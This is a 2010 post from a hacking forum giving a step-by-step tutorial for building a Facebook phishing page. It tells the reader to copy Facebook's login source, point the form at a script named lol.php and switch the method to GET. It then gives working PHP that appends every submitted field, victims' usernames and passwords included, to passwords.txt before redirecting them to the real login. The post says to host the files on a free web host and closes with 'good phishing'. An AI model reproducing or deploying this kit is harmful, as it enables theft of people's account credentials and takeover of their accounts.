Hacking
Would you like to react to this message? Create an account in a few clicks or log in to continue.


hacking
 
HomeLatest imagesSearchRegisterLog in

 

 [Tut] How to Make Phishing Sites [Tut]

Go down 
AuthorMessage
Admin
Admin



Posts : 3
Join date : 2010-01-06

[Tut] How to Make Phishing Sites [Tut] Empty
PostSubject: [Tut] How to Make Phishing Sites [Tut]   [Tut] How to Make Phishing Sites [Tut] Icon_minitimeWed Jan 06, 2010 2:14 pm

Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.
2) we need to change some codes so press: Control + F
3) search for action
4) You should get: action=www.facebook.com/login and bla bla bla
5) delete all the facebook.com crap, and put: lol.php
6) beside action you will see something saying: method=post
7) change "post" to "get"
Cool save the file, name it: index.php and save it to desktop but remember! where it says: "save as type" change it to "all files" this is very important
9) make a new file in notepad, and put this code:

<?php
header("Location: https://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt

12) now upload all of them in www.t35.com
good luck and good phishing!
Back to top Go down
https://hacking122.darkbb.com
 
[Tut] How to Make Phishing Sites [Tut]
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Hacking :: Hacking Tutorials-
Jump to: